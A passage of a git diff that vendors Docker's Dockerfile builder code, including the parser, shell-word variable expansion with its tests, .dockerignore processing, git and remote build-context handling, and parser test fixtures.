+(add ".tmux.conf" "/") +(run "echo \"export TERM=screen-256color\" >/.zshenv") +(cmd "zsh -c weechat") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/znc/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/znc/Dockerfile new file mode 100644 index 0000000000..3a4da6e916 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/znc/Dockerfile @@ -0,0 +1,7 @@ +FROM ubuntu:14.04 +MAINTAINER Erik Hollensbe + +RUN apt-get update && apt-get install znc -y +ADD conf /.znc + +CMD [ "/usr/bin/znc", "-f", "-r" ] diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/znc/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/znc/result new file mode 100644 index 0000000000..5493b255fd --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/znc/result @@ -0,0 +1,5 @@ +(from "ubuntu:14.04") +(maintainer "Erik Hollensbe ") +(run "apt-get update && apt-get install znc -y") +(add "conf" "/.znc") +(cmd "/usr/bin/znc" "-f" "-r") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/utils.go b/vendor/github.com/docker/docker/builder/dockerfile/parser/utils.go new file mode 100644 index 0000000000..cd7af75e79 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/utils.go @@ -0,0 +1,176 @@ +package parser + +import ( + "fmt" + "strconv" + "strings" + "unicode" +) + +// Dump dumps the AST defined by `node` as a list of sexps. +// Returns a string suitable for printing. +func (node *Node) Dump() string { + str := "" + str += node.Value + + if len(node.Flags) > 0 { + str += fmt.Sprintf(" %q", node.Flags) + } + + for _, n := range node.Children { + str += "(" + n.Dump() + ")\n" + } + + if node.Next != nil { + for n := node.Next; n != nil; n = n.Next { + if len(n.Children) > 0 { + str += " " + n.Dump() + } else { + str += " " + strconv.Quote(n.Value) + } + } + } + + return strings.TrimSpace(str) +} + +// performs the dispatch based on the two primal strings, cmd and args. Please +// look at the dispatch table in parser.go to see how these dispatchers work. +func fullDispatch(cmd, args string, d *Directive) (*Node, map[string]bool, error) { + fn := dispatch[cmd] + + // Ignore invalid Dockerfile instructions + if fn == nil { + fn = parseIgnore + } + + sexp, attrs, err := fn(args, d) + if err != nil { + return nil, nil, err + } + + return sexp, attrs, nil +} + +// splitCommand takes a single line of text and parses out the cmd and args, +// which are used for dispatching to more exact parsing functions. +func splitCommand(line string) (string, []string, string, error) { + var args string + var flags []string + + // Make sure we get the same results irrespective of leading/trailing spaces + cmdline := tokenWhitespace.Split(strings.TrimSpace(line), 2) + cmd := strings.ToLower(cmdline[0]) + + if len(cmdline) == 2 { + var err error + args, flags, err = extractBuilderFlags(cmdline[1]) + if err != nil { + return "", nil, "", err + } + } + + return cmd, flags, strings.TrimSpace(args), nil +} + +// covers comments and empty lines. Lines should be trimmed before passing to +// this function. +func stripComments(line string) string { + // string is already trimmed at this point + if tokenComment.MatchString(line) { + return tokenComment.ReplaceAllString(line, "") + } + + return line +} + +func extractBuilderFlags(line string) (string, []string, error) { + // Parses the BuilderFlags and returns the remaining part of the line + + const ( + inSpaces = iota // looking for start of a word + inWord + inQuote + ) + + words := []string{} + phase := inSpaces + word := "" + quote := '\000' + blankOK := false + var ch rune + + for pos := 0; pos <= len(line); pos++ { + if pos != len(line) { + ch = rune(line[pos]) + } + + if phase == inSpaces { // Looking for start of word + if pos == len(line) { // end of input + break + } + if unicode.IsSpace(ch) { // skip spaces + continue + } + + // Only keep going if the next word starts with -- + if ch != '-' || pos+1 == len(line) || rune(line[pos+1]) != '-' { + return line[pos:], words, nil + } + + phase = inWord // found someting with "--", fall through + } + if (phase == inWord || phase == inQuote) && (pos == len(line)) { + if word != "--" && (blankOK || len(word) > 0) { + words = append(words, word) + } + break + } + if phase == inWord { + if unicode.IsSpace(ch) { + phase = inSpaces + if word == "--" { + return line[pos:], words, nil + } + if blankOK || len(word) > 0 { + words = append(words, word) + } + word = "" + blankOK = false + continue + } + if ch == '\'' || ch == '"' { + quote = ch + blankOK = true + phase = inQuote + continue + } + if ch == '\\' { + if pos+1 == len(line) { + continue // just skip \ at end + } + pos++ + ch = rune(line[pos]) + } + word += string(ch) + continue + } + if phase == inQuote { + if ch == quote { + phase = inWord + continue + } + if ch == '\\' { + if pos+1 == len(line) { + phase = inWord + continue // just skip \ at end + } + pos++ + ch = rune(line[pos]) + } + word += string(ch) + } + } + + return "", words, nil +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/shell_parser.go b/vendor/github.com/docker/docker/builder/dockerfile/shell_parser.go new file mode 100644 index 0000000000..189afd1fdb --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/shell_parser.go @@ -0,0 +1,329 @@ +package dockerfile + +// This will take a single word and an array of env variables and +// process all quotes (" and ') as well as $xxx and ${xxx} env variable +// tokens. Tries to mimic bash shell process. +// It doesn't support all flavors of ${xx:...} formats but new ones can +// be added by adding code to the "special ${} format processing" section + +import ( + "fmt" + "runtime" + "strings" + "text/scanner" + "unicode" +) + +type shellWord struct { + word string + scanner scanner.Scanner + envs []string + pos int + escapeToken rune +} + +// ProcessWord will use the 'env' list of environment variables, +// and replace any env var references in 'word'. +func ProcessWord(word string, env []string, escapeToken rune) (string, error) { + sw := &shellWord{ + word: word, + envs: env, + pos: 0, + escapeToken: escapeToken, + } + sw.scanner.Init(strings.NewReader(word)) + word, _, err := sw.process() + return word, err +} + +// ProcessWords will use the 'env' list of environment variables, +// and replace any env var references in 'word' then it will also +// return a slice of strings which represents the 'word' +// split up based on spaces - taking into account quotes. Note that +// this splitting is done **after** the env var substitutions are done. +// Note, each one is trimmed to remove leading and trailing spaces (unless +// they are quoted", but ProcessWord retains spaces between words. +func ProcessWords(word string, env []string, escapeToken rune) ([]string, error) { + sw := &shellWord{ + word: word, + envs: env, + pos: 0, + escapeToken: escapeToken, + } + sw.scanner.Init(strings.NewReader(word)) + _, words, err := sw.process() + return words, err +} + +func (sw *shellWord) process() (string, []string, error) { + return sw.processStopOn(scanner.EOF) +} + +type wordsStruct struct { + word string + words []string + inWord bool +} + +func (w *wordsStruct) addChar(ch rune) { + if unicode.IsSpace(ch) && w.inWord { + if len(w.word) != 0 { + w.words = append(w.words, w.word) + w.word = "" + w.inWord = false + } + } else if !unicode.IsSpace(ch) { + w.addRawChar(ch) + } +} + +func (w *wordsStruct) addRawChar(ch rune) { + w.word += string(ch) + w.inWord = true +} + +func (w *wordsStruct) addString(str string) { + var scan scanner.Scanner + scan.Init(strings.NewReader(str)) + for scan.Peek() != scanner.EOF { + w.addChar(scan.Next()) + } +} + +func (w *wordsStruct) addRawString(str string) { + w.word += str + w.inWord = true +} + +func (w *wordsStruct) getWords() []string { + if len(w.word) > 0 { + w.words = append(w.words, w.word) + + // Just in case we're called again by mistake + w.word = "" + w.inWord = false + } + return w.words +} + +// Process the word, starting at 'pos', and stop when we get to the +// end of the word or the 'stopChar' character +func (sw *shellWord) processStopOn(stopChar rune) (string, []string, error) { + var result string + var words wordsStruct + + var charFuncMapping = map[rune]func() (string, error){ + '\'': sw.processSingleQuote, + '"': sw.processDoubleQuote, + '$': sw.processDollar, + } + + for sw.scanner.Peek() != scanner.EOF { + ch := sw.scanner.Peek() + + if stopChar != scanner.EOF && ch == stopChar { + sw.scanner.Next() + break + } + if fn, ok := charFuncMapping[ch]; ok { + // Call special processing func for certain chars + tmp, err := fn() + if err != nil { + return "", []string{}, err + } + result += tmp + + if ch == rune('$') { + words.addString(tmp) + } else { + words.addRawString(tmp) + } + } else { + // Not special, just add it to the result + ch = sw.scanner.Next() + + if ch == sw.escapeToken { + // '\' (default escape token, but ` allowed) escapes, except end of line + + ch = sw.scanner.Next() + + if ch == scanner.EOF { + break + } + + words.addRawChar(ch) + } else { + words.addChar(ch) + } + + result += string(ch) + } + } + + return result, words.getWords(), nil +} + +func (sw *shellWord) processSingleQuote() (string, error) { + // All chars between single quotes are taken as-is + // Note, you can't escape ' + var result string + + sw.scanner.Next() + + for { + ch := sw.scanner.Next() + if ch == '\'' || ch == scanner.EOF { + break + } + result += string(ch) + } + + return result, nil +} + +func (sw *shellWord) processDoubleQuote() (string, error) { + // All chars up to the next " are taken as-is, even ', except any $ chars + // But you can escape " with a \ (or ` if escape token set accordingly) + var result string + + sw.scanner.Next() + + for sw.scanner.Peek() != scanner.EOF { + ch := sw.scanner.Peek() + if ch == '"' { + sw.scanner.Next() + break + } + if ch == '$' { + tmp, err := sw.processDollar() + if err != nil { + return "", err + } + result += tmp + } else { + ch = sw.scanner.Next() + if ch == sw.escapeToken { + chNext := sw.scanner.Peek() + + if chNext == scanner.EOF { + // Ignore \ at end of word + continue + } + + if chNext == '"' || chNext == '$' { + // \" and \$ can be escaped, all other \'s are left as-is + ch = sw.scanner.Next() + } + } + result += string(ch) + } + } + + return result, nil +} + +func (sw *shellWord) processDollar() (string, error) { + sw.scanner.Next() + ch := sw.scanner.Peek() + if ch == '{' { + sw.scanner.Next() + name := sw.processName() + ch = sw.scanner.Peek() + if ch == '}' { + // Normal ${xx} case + sw.scanner.Next() + return sw.getEnv(name), nil + } + if ch == ':' { + // Special ${xx:...} format processing + // Yes it allows for recursive $'s in the ... spot + + sw.scanner.Next() // skip over : + modifier := sw.scanner.Next() + + word, _, err := sw.processStopOn('}') + if err != nil { + return "", err + } + + // Grab the current value of the variable in question so we + // can use to to determine what to do based on the modifier + newValue := sw.getEnv(name) + + switch modifier { + case '+': + if newValue != "" { + newValue = word + } + return newValue, nil + + case '-': + if newValue == "" { + newValue = word + } + return newValue, nil + + default: + return "", fmt.Errorf("Unsupported modifier (%c) in substitution: %s", modifier, sw.word) + } + } + return "", fmt.Errorf("Missing ':' in substitution: %s", sw.word) + } + // $xxx case + name := sw.processName() + if name == "" { + return "$", nil + } + return sw.getEnv(name), nil +} + +func (sw *shellWord) processName() string { + // Read in a name (alphanumeric or _) + // If it starts with a numeric then just return $# + var name string + + for sw.scanner.Peek() != scanner.EOF { + ch := sw.scanner.Peek() + if len(name) == 0 && unicode.IsDigit(ch) { + ch = sw.scanner.Next() + return string(ch) + } + if !unicode.IsLetter(ch) && !unicode.IsDigit(ch) && ch != '_' { + break + } + ch = sw.scanner.Next() + name += string(ch) + } + + return name +} + +func (sw *shellWord) getEnv(name string) string { + if runtime.GOOS == "windows" { + // Case-insensitive environment variables on Windows + name = strings.ToUpper(name) + } + for _, env := range sw.envs { + i := strings.Index(env, "=") + if i < 0 { + if runtime.GOOS == "windows" { + env = strings.ToUpper(env) + } + if name == env { + // Should probably never get here, but just in case treat + // it like "var" and "var=" are the same + return "" + } + continue + } + compareName := env[:i] + if runtime.GOOS == "windows" { + compareName = strings.ToUpper(compareName) + } + if name != compareName { + continue + } + return env[i+1:] + } + return "" +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/shell_parser_test.go b/vendor/github.com/docker/docker/builder/dockerfile/shell_parser_test.go new file mode 100644 index 0000000000..6cf691c077 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/shell_parser_test.go @@ -0,0 +1,155 @@ +package dockerfile + +import ( + "bufio" + "os" + "runtime" + "strings" + "testing" +) + +func TestShellParser4EnvVars(t *testing.T) { + fn := "envVarTest" + lineCount := 0 + + file, err := os.Open(fn) + if err != nil { + t.Fatalf("Can't open '%s': %s", err, fn) + } + defer file.Close() + + scanner := bufio.NewScanner(file) + envs := []string{"PWD=/home", "SHELL=bash", "KOREAN=한국어"} + for scanner.Scan() { + line := scanner.Text() + lineCount++ + + // Trim comments and blank lines + i := strings.Index(line, "#") + if i >= 0 { + line = line[:i] + } + line = strings.TrimSpace(line) + + if line == "" { + continue + } + + words := strings.Split(line, "|") + if len(words) != 3 { + t.Fatalf("Error in '%s' - should be exactly one | in:%q", fn, line) + } + + words[0] = strings.TrimSpace(words[0]) + words[1] = strings.TrimSpace(words[1]) + words[2] = strings.TrimSpace(words[2]) + + // Key W=Windows; A=All; U=Unix + if (words[0] != "W") && (words[0] != "A") && (words[0] != "U") { + t.Fatalf("Invalid tag %s at line %d of %s. Must be W, A or U", words[0], lineCount, fn) + } + + if ((words[0] == "W" || words[0] == "A") && runtime.GOOS == "windows") || + ((words[0] == "U" || words[0] == "A") && runtime.GOOS != "windows") { + newWord, err := ProcessWord(words[1], envs, '\\') + + if err != nil { + newWord = "error" + } + + if newWord != words[2] { + t.Fatalf("Error. Src: %s Calc: %s Expected: %s at line %d", words[1], newWord, words[2], lineCount) + } + } + } +} + +func TestShellParser4Words(t *testing.T) { + fn := "wordsTest" + + file, err := os.Open(fn) + if err != nil { + t.Fatalf("Can't open '%s': %s", err, fn) + } + defer file.Close() + + envs := []string{} + scanner := bufio.NewScanner(file) + for scanner.Scan() { + line := scanner.Text() + + if strings.HasPrefix(line, "#") { + continue + } + + if strings.HasPrefix(line, "ENV ") { + line = strings.TrimLeft(line[3:], " ") + envs = append(envs, line) + continue + } + + words := strings.Split(line, "|") + if len(words) != 2 { + t.Fatalf("Error in '%s' - should be exactly one | in: %q", fn, line) + } + test := strings.TrimSpace(words[0]) + expected := strings.Split(strings.TrimLeft(words[1], " "), ",") + + result, err := ProcessWords(test, envs, '\\') + + if err != nil { + result = []string{"error"} + } + + if len(result) != len(expected) { + t.Fatalf("Error. %q was suppose to result in %q, but got %q instead", test, expected, result) + } + for i, w := range expected { + if w != result[i] { + t.Fatalf("Error. %q was suppose to result in %q, but got %q instead", test, expected, result) + } + } + } +} + +func TestGetEnv(t *testing.T) { + sw := &shellWord{ + word: "", + envs: nil, + pos: 0, + } + + sw.envs = []string{} + if sw.getEnv("foo") != "" { + t.Fatalf("2 - 'foo' should map to ''") + } + + sw.envs = []string{"foo"} + if sw.getEnv("foo") != "" { + t.Fatalf("3 - 'foo' should map to ''") + } + + sw.envs = []string{"foo="} + if sw.getEnv("foo") != "" { + t.Fatalf("4 - 'foo' should map to ''") + } + + sw.envs = []string{"foo=bar"} + if sw.getEnv("foo") != "bar" { + t.Fatalf("5 - 'foo' should map to 'bar'") + } + + sw.envs = []string{"foo=bar", "car=hat"} + if sw.getEnv("foo") != "bar" { + t.Fatalf("6 - 'foo' should map to 'bar'") + } + if sw.getEnv("car") != "hat" { + t.Fatalf("7 - 'car' should map to 'hat'") + } + + // Make sure we grab the first 'car' in the list + sw.envs = []string{"foo=bar", "car=hat", "car=bike"} + if sw.getEnv("car") != "hat" { + t.Fatalf("8 - 'car' should map to 'hat'") + } +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/support.go b/vendor/github.com/docker/docker/builder/dockerfile/support.go new file mode 100644 index 0000000000..e87588910b --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/support.go @@ -0,0 +1,19 @@ +package dockerfile + +import "strings" + +// handleJSONArgs parses command passed to CMD, ENTRYPOINT, RUN and SHELL instruction in Dockerfile +// for exec form it returns untouched args slice +// for shell form it returns concatenated args as the first element of a slice +func handleJSONArgs(args []string, attributes map[string]bool) []string { + if len(args) == 0 { + return []string{} + } + + if attributes != nil && attributes["json"] { + return args + } + + // literal string command, not an exec array + return []string{strings.Join(args, " ")} +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/support_test.go b/vendor/github.com/docker/docker/builder/dockerfile/support_test.go new file mode 100644 index 0000000000..7cc6fe9dcb --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/support_test.go @@ -0,0 +1,65 @@ +package dockerfile + +import "testing" + +type testCase struct { + name string + args []string + attributes map[string]bool + expected []string +} + +func initTestCases() []testCase { + testCases := []testCase{} + + testCases = append(testCases, testCase{ + name: "empty args", + args: []string{}, + attributes: make(map[string]bool), + expected: []string{}, + }) + + jsonAttributes := make(map[string]bool) + jsonAttributes["json"] = true + + testCases = append(testCases, testCase{ + name: "json attribute with one element", + args: []string{"foo"}, + attributes: jsonAttributes, + expected: []string{"foo"}, + }) + + testCases = append(testCases, testCase{ + name: "json attribute with two elements", + args: []string{"foo", "bar"}, + attributes: jsonAttributes, + expected: []string{"foo", "bar"}, + }) + + testCases = append(testCases, testCase{ + name: "no attributes", + args: []string{"foo", "bar"}, + attributes: nil, + expected: []string{"foo bar"}, + }) + + return testCases +} + +func TestHandleJSONArgs(t *testing.T) { + testCases := initTestCases() + + for _, test := range testCases { + arguments := handleJSONArgs(test.args, test.attributes) + + if len(arguments) != len(test.expected) { + t.Fatalf("In test \"%s\": length of returned slice is incorrect. Expected: %d, got: %d", test.name, len(test.expected), len(arguments)) + } + + for i := range test.expected { + if arguments[i] != test.expected[i] { + t.Fatalf("In test \"%s\": element as position %d is incorrect. Expected: %s, got: %s", test.name, i, test.expected[i], arguments[i]) + } + } + } +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/utils_test.go b/vendor/github.com/docker/docker/builder/dockerfile/utils_test.go new file mode 100644 index 0000000000..80a3f1babf --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/utils_test.go @@ -0,0 +1,50 @@ +package dockerfile + +import ( + "io/ioutil" + "os" + "path/filepath" + "testing" +) + +// createTestTempDir creates a temporary directory for testing. +// It returns the created path and a cleanup function which is meant to be used as deferred call. +// When an error occurs, it terminates the test. +func createTestTempDir(t *testing.T, dir, prefix string) (string, func()) { + path, err := ioutil.TempDir(dir, prefix) + + if err != nil { + t.Fatalf("Error when creating directory %s with prefix %s: %s", dir, prefix, err) + } + + return path, func() { + err = os.RemoveAll(path) + + if err != nil { + t.Fatalf("Error when removing directory %s: %s", path, err) + } + } +} + +// createTestTempFile creates a temporary file within dir with specific contents and permissions. +// When an error occurs, it terminates the test +func createTestTempFile(t *testing.T, dir, filename, contents string, perm os.FileMode) string { + filePath := filepath.Join(dir, filename) + err := ioutil.WriteFile(filePath, []byte(contents), perm) + + if err != nil { + t.Fatalf("Error when creating %s file: %s", filename, err) + } + + return filePath +} + +// createTestSymlink creates a symlink file within dir which points to oldname +func createTestSymlink(t *testing.T, dir, filename, oldname string) string { + filePath := filepath.Join(dir, filename) + if err := os.Symlink(oldname, filePath); err != nil { + t.Fatalf("Error when creating %s symlink to %s: %s", filename, oldname, err) + } + + return filePath +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/wordsTest b/vendor/github.com/docker/docker/builder/dockerfile/wordsTest new file mode 100644 index 0000000000..fa916c67f9 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/wordsTest @@ -0,0 +1,25 @@ +hello | hello +hello${hi}bye | hellobye +ENV hi=hi +hello${hi}bye | hellohibye +ENV space=abc def +hello${space}bye | helloabc,defbye +hello"${space}"bye | helloabc defbye +hello "${space}"bye | hello,abc defbye +ENV leading= ab c +hello${leading}def | hello,ab,cdef +hello"${leading}" def | hello ab c,def +hello"${leading}" | hello ab c +hello${leading} | hello,ab,c +# next line MUST have 3 trailing spaces, don't erase them! +ENV trailing=ab c +hello${trailing} | helloab,c +hello${trailing}d | helloab,c,d +hello"${trailing}"d | helloab c d +# next line MUST have 3 trailing spaces, don't erase them! +hel"lo${trailing}" | helloab c +hello" there " | hello there +hello there | hello,there +hello\ there | hello there +hello" there | hello there +hello\" there | hello",there diff --git a/vendor/github.com/docker/docker/builder/dockerignore.go b/vendor/github.com/docker/docker/builder/dockerignore.go new file mode 100644 index 0000000000..3da7913367 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerignore.go @@ -0,0 +1,48 @@ +package builder + +import ( + "os" + + "github.com/docker/docker/builder/dockerignore" + "github.com/docker/docker/pkg/fileutils" +) + +// DockerIgnoreContext wraps a ModifiableContext to add a method +// for handling the .dockerignore file at the root of the context. +type DockerIgnoreContext struct { + ModifiableContext +} + +// Process reads the .dockerignore file at the root of the embedded context. +// If .dockerignore does not exist in the context, then nil is returned. +// +// It can take a list of files to be removed after .dockerignore is removed. +// This is used for server-side implementations of builders that need to send +// the .dockerignore file as well as the special files specified in filesToRemove, +// but expect them to be excluded from the context after they were processed. +// +// For example, server-side Dockerfile builders are expected to pass in the name +// of the Dockerfile to be removed after it was parsed. +// +// TODO: Don't require a ModifiableContext (use Context instead) and don't remove +// files, instead handle a list of files to be excluded from the context. +func (c DockerIgnoreContext) Process(filesToRemove []string) error { + f, err := c.Open(".dockerignore") + // Note that a missing .dockerignore file isn't treated as an error + if err != nil { + if os.IsNotExist(err) { + return nil + } + return err + } + excludes, _ := dockerignore.ReadAll(f) + f.Close() + filesToRemove = append([]string{".dockerignore"}, filesToRemove...) + for _, fileToRemove := range filesToRemove { + rm, _ := fileutils.Matches(fileToRemove, excludes) + if rm { + c.Remove(fileToRemove) + } + } + return nil +} diff --git a/vendor/github.com/docker/docker/builder/dockerignore/dockerignore.go b/vendor/github.com/docker/docker/builder/dockerignore/dockerignore.go new file mode 100644 index 0000000000..2db67be799 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerignore/dockerignore.go @@ -0,0 +1,49 @@ +package dockerignore + +import ( + "bufio" + "bytes" + "fmt" + "io" + "path/filepath" + "strings" +) + +// ReadAll reads a .dockerignore file and returns the list of file patterns +// to ignore. Note this will trim whitespace from each line as well +// as use GO's "clean" func to get the shortest/cleanest path for each. +func ReadAll(reader io.Reader) ([]string, error) { + if reader == nil { + return nil, nil + } + + scanner := bufio.NewScanner(reader) + var excludes []string + currentLine := 0 + + utf8bom := []byte{0xEF, 0xBB, 0xBF} + for scanner.Scan() { + scannedBytes := scanner.Bytes() + // We trim UTF8 BOM + if currentLine == 0 { + scannedBytes = bytes.TrimPrefix(scannedBytes, utf8bom) + } + pattern := string(scannedBytes) + currentLine++ + // Lines starting with # (comments) are ignored before processing + if strings.HasPrefix(pattern, "#") { + continue + } + pattern = strings.TrimSpace(pattern) + if pattern == "" { + continue + } + pattern = filepath.Clean(pattern) + pattern = filepath.ToSlash(pattern) + excludes = append(excludes, pattern) + } + if err := scanner.Err(); err != nil { + return nil, fmt.Errorf("Error reading .dockerignore: %v", err) + } + return excludes, nil +} diff --git a/vendor/github.com/docker/docker/builder/dockerignore/dockerignore_test.go b/vendor/github.com/docker/docker/builder/dockerignore/dockerignore_test.go new file mode 100644 index 0000000000..612a1399cd --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerignore/dockerignore_test.go @@ -0,0 +1,57 @@ +package dockerignore + +import ( + "fmt" + "io/ioutil" + "os" + "path/filepath" + "testing" +) + +func TestReadAll(t *testing.T) { + tmpDir, err := ioutil.TempDir("", "dockerignore-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpDir) + + di, err := ReadAll(nil) + if err != nil { + t.Fatalf("Expected not to have error, got %v", err) + } + + if diLen := len(di); diLen != 0 { + t.Fatalf("Expected to have zero dockerignore entry, got %d", diLen) + } + + diName := filepath.Join(tmpDir, ".dockerignore") + content := fmt.Sprintf("test1\n/test2\n/a/file/here\n\nlastfile") + err = ioutil.WriteFile(diName, []byte(content), 0777) + if err != nil { + t.Fatal(err) + } + + diFd, err := os.Open(diName) + if err != nil { + t.Fatal(err) + } + defer diFd.Close() + + di, err = ReadAll(diFd) + if err != nil { + t.Fatal(err) + } + + if di[0] != "test1" { + t.Fatalf("First element is not test1") + } + if di[1] != "/test2" { + t.Fatalf("Second element is not /test2") + } + if di[2] != "/a/file/here" { + t.Fatalf("Third element is not /a/file/here") + } + if di[3] != "lastfile" { + t.Fatalf("Fourth element is not lastfile") + } +} diff --git a/vendor/github.com/docker/docker/builder/dockerignore_test.go b/vendor/github.com/docker/docker/builder/dockerignore_test.go new file mode 100644 index 0000000000..3c0ceda4cf --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerignore_test.go @@ -0,0 +1,95 @@ +package builder + +import ( + "io/ioutil" + "log" + "os" + "sort" + "testing" +) + +const shouldStayFilename = "should_stay" + +func extractFilenames(files []os.FileInfo) []string { + filenames := make([]string, len(files), len(files)) + + for i, file := range files { + filenames[i] = file.Name() + } + + return filenames +} + +func checkDirectory(t *testing.T, dir string, expectedFiles []string) { + files, err := ioutil.ReadDir(dir) + + if err != nil { + t.Fatalf("Could not read directory: %s", err) + } + + if len(files) != len(expectedFiles) { + log.Fatalf("Directory should contain exactly %d file(s), got %d", len(expectedFiles), len(files)) + } + + filenames := extractFilenames(files) + sort.Strings(filenames) + sort.Strings(expectedFiles) + + for i, filename := range filenames { + if filename != expectedFiles[i] { + t.Fatalf("File %s should be in the directory, got: %s", expectedFiles[i], filename) + } + } +} + +func executeProcess(t *testing.T, contextDir string) { + modifiableCtx := &tarSumContext{root: contextDir} + ctx := DockerIgnoreContext{ModifiableContext: modifiableCtx} + + err := ctx.Process([]string{DefaultDockerfileName}) + + if err != nil { + t.Fatalf("Error when executing Process: %s", err) + } +} + +func TestProcessShouldRemoveDockerfileDockerignore(t *testing.T) { + contextDir, cleanup := createTestTempDir(t, "", "builder-dockerignore-process-test") + defer cleanup() + + createTestTempFile(t, contextDir, shouldStayFilename, testfileContents, 0777) + createTestTempFile(t, contextDir, dockerignoreFilename, "Dockerfile\n.dockerignore", 0777) + createTestTempFile(t, contextDir, DefaultDockerfileName, dockerfileContents, 0777) + + executeProcess(t, contextDir) + + checkDirectory(t, contextDir, []string{shouldStayFilename}) + +} + +func TestProcessNoDockerignore(t *testing.T) { + contextDir, cleanup := createTestTempDir(t, "", "builder-dockerignore-process-test") + defer cleanup() + + createTestTempFile(t, contextDir, shouldStayFilename, testfileContents, 0777) + createTestTempFile(t, contextDir, DefaultDockerfileName, dockerfileContents, 0777) + + executeProcess(t, contextDir) + + checkDirectory(t, contextDir, []string{shouldStayFilename, DefaultDockerfileName}) + +} + +func TestProcessShouldLeaveAllFiles(t *testing.T) { + contextDir, cleanup := createTestTempDir(t, "", "builder-dockerignore-process-test") + defer cleanup() + + createTestTempFile(t, contextDir, shouldStayFilename, testfileContents, 0777) + createTestTempFile(t, contextDir, DefaultDockerfileName, dockerfileContents, 0777) + createTestTempFile(t, contextDir, dockerignoreFilename, "input1\ninput2", 0777) + + executeProcess(t, contextDir) + + checkDirectory(t, contextDir, []string{shouldStayFilename, DefaultDockerfileName, dockerignoreFilename}) + +} diff --git a/vendor/github.com/docker/docker/builder/git.go b/vendor/github.com/docker/docker/builder/git.go new file mode 100644 index 0000000000..74df244611 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/git.go @@ -0,0 +1,28 @@ +package builder + +import ( + "os" + + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/gitutils" +) + +// MakeGitContext returns a Context from gitURL that is cloned in a temporary directory. +func MakeGitContext(gitURL string) (ModifiableContext, error) { + root, err := gitutils.Clone(gitURL) + if err != nil { + return nil, err + } + + c, err := archive.Tar(root, archive.Uncompressed) + if err != nil { + return nil, err + } + + defer func() { + // TODO: print errors? + c.Close() + os.RemoveAll(root) + }() + return MakeTarSumContext(c) +} diff --git a/vendor/github.com/docker/docker/builder/remote.go b/vendor/github.com/docker/docker/builder/remote.go new file mode 100644 index 0000000000..f3a4329d16 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/remote.go @@ -0,0 +1,157 @@ +package builder + +import ( + "bytes" + "errors" + "fmt" + "io" + "io/ioutil" + "regexp" + + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/httputils" + "github.com/docker/docker/pkg/urlutil" +) + +// When downloading remote contexts, limit the amount (in bytes) +// to be read from the response body in order to detect its Content-Type +const maxPreambleLength = 100 + +const acceptableRemoteMIME = `(?:application/(?:(?:x\-)?tar|octet\-stream|((?:x\-)?(?:gzip|bzip2?|xz)))|(?:text/plain))` + +var mimeRe = regexp.MustCompile(acceptableRemoteMIME) + +// MakeRemoteContext downloads a context from remoteURL and returns it. +// +// If contentTypeHandlers is non-nil, then the Content-Type header is read along with a maximum of +// maxPreambleLength bytes from the body to help detecting the MIME type. +// Look at acceptableRemoteMIME for more details. +// +// If a match is found, then the body is sent to the contentType handler and a (potentially compressed) tar stream is expected +// to be returned. If no match is found, it is assumed the body is a tar stream (compressed or not). +// In either case, an (assumed) tar stream is passed to MakeTarSumContext whose result is returned. +func MakeRemoteContext(remoteURL string, contentTypeHandlers map[string]func(io.ReadCloser) (io.ReadCloser, error)) (ModifiableContext, error) { + f, err := httputils.Download(remoteURL) + if err != nil { + return nil, fmt.Errorf("error downloading remote context %s: %v", remoteURL, err) + } + defer f.Body.Close() + + var contextReader io.ReadCloser + if contentTypeHandlers != nil { + contentType := f.Header.Get("Content-Type") + clen := f.ContentLength + + contentType, contextReader, err = inspectResponse(contentType, f.Body, clen) + if err != nil { + return nil, fmt.Errorf("error detecting content type for remote %s: %v", remoteURL, err) + } + defer contextReader.Close() + + // This loop tries to find a content-type handler for the detected content-type. + // If it could not find one from the caller-supplied map, it tries the empty content-type `""` + // which is interpreted as a fallback handler (usually used for raw tar contexts). + for _, ct := range []string{contentType, ""} { + if fn, ok := contentTypeHandlers[ct]; ok { + defer contextReader.Close() + if contextReader, err = fn(contextReader); err != nil { + return nil, err + } + break + } + } + } + + // Pass through - this is a pre-packaged context, presumably + // with a Dockerfile with the right name inside it. + return MakeTarSumContext(contextReader) +} + +// DetectContextFromRemoteURL returns a context and in certain cases the name of the dockerfile to be used +// irrespective of user input. +// progressReader is only used if remoteURL is actually a URL (not empty, and not a Git endpoint). +func DetectContextFromRemoteURL(r io.ReadCloser, remoteURL string, createProgressReader func(in io.ReadCloser) io.ReadCloser) (context ModifiableContext, dockerfileName string, err error) { + switch { + case remoteURL == "": + context, err = MakeTarSumContext(r) + case urlutil.IsGitURL(remoteURL): + context, err = MakeGitContext(remoteURL) + case urlutil.IsURL(remoteURL): + context, err = MakeRemoteContext(remoteURL, map[string]func(io.ReadCloser) (io.ReadCloser, error){ + httputils.MimeTypes.TextPlain: func(rc io.ReadCloser) 